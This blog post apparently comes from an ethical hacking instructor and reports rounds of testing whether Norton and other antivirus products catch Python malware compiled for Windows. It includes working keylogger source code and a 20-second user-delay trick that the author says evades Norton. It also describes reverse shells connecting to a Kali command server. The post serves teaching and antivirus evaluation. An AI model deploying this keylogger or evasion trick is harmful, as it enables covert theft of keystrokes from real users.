Norton v. Python

I am trying to sneak attacks past Norton Antivirus using Python.

Directory

Round 1: Simple Listener -- NORTON WINS
Round 2: Simple Listener with Time Delay -- PYTHON WINS
Round 3: Reverse Shell -- PYTHON WINS
Round 4: Reverse Shell v. NOD32, Avast, and 360 Internet Security -- PYTHON WINS
Round 5: Reverse Shell v. McAfee and Kaspersky -- PYTHON WINS
Round 6: Reverse Shell v. F-Secure -- F-Secure WINS

Round 1: Simple Listener -- NORTON WINS!

I recently gave my Ethical Hacking students some homework projects in which they make malware in Python and compile it to Windows executables.

Antivirus Evasion with Python
Keylogger with Python

They both pass right through VirusTotal with 1 or 0 detections, so I was complaining on Twitter that antivirus was not working.

@NortonSupport responded on Twitter and said their full version, installed locally, would do better with heuristic detection.

They sent me to this link to get a 30-day trial version of Norton:

http://goo.gl/BPq4DN

So I installed that on a VM, let it update, and ran the malware with these results:

So Norton in actual use is a lot better than I thought--it does detect these attacks!

I appreciate the fast and very polite help I got from @NortonSupport, and I am now far more impressed with the efficacy of their product!

Round 2: Simple Listener with Time Delay -- PYTHON WINS

I posted the stuff above on Twitter, and then this happened:

So I modified my Python code to this:

import pythoncom, pyHook, sys, logging

x=raw_input("Press Enter to continue")

LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    print "Key: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Then I ran it in a console and waited 20 seconds before pressing Enter.

And it's true! Now Norton says nothing at all, even though the keylogger runs, stealing my stuff. Bad Norton, Bad Bad!

Round 3: Reverse Shell -- PYTHON WINS

I decided to try a more powerful attack: a reverse shell, using the same process.

This time no delay was required at all, and the same procedure worked for a two-stage attack.

When the target Windows box on the left runs the executable, it connects back to the Kali Linux C&C server and requests instructions.

I have local privileges on the box and it is under external control, and Norton Antivirus doesn't do anything about it--it just says "All Threats Resolved".

Bad Norton, Very Bad!

Round 4: Reverse Shell v. NOD32, Avast, and 360 Internet Security -- PYTHON WINS

Using the same reverse shell in the hacking lab on real Windows 7 machines (not virtual), with a virtual Kali Linux C & C server, all three antivirus products fail.

360 Internet Security Failing

Avast! Failing

ESET NOD32 Failing

Round 5: Reverse Shell v. McAfee and Kaspersky-- PYTHON WINS

Using the same reverse shell in the hacking lab on real Windows 7 machines (not virtual), with a virtual Kali Linux C & C server, both antivirus products fail.

McAfee AntiVirus Plus

Kaspersky Anti-Virus

Round 6: Reverse Shell v. F-Secure -- F-Secure WINS

Using the same reverse shell on a virtual Windows 7 machine, with a virtual Kali Linux C & C server, F-Secure's simple heuristics test works. This is a good idea--just block all unfamiliar code until it's approved--a simple form of whitelisting.

F-Secure INTERNET SECURITY 2014


Posted 3:31 PM 3-20-14 by Sam Bowne
Round 2 added 4:03 pm 3-20-14
Round 3 added and directory added 11:15 am 3-24-14
Round 4 added 3-24-14 9:49 pm
Round 5 added 3-27-14 12:57 pm
Round 6 added 4-4-14 11:14 am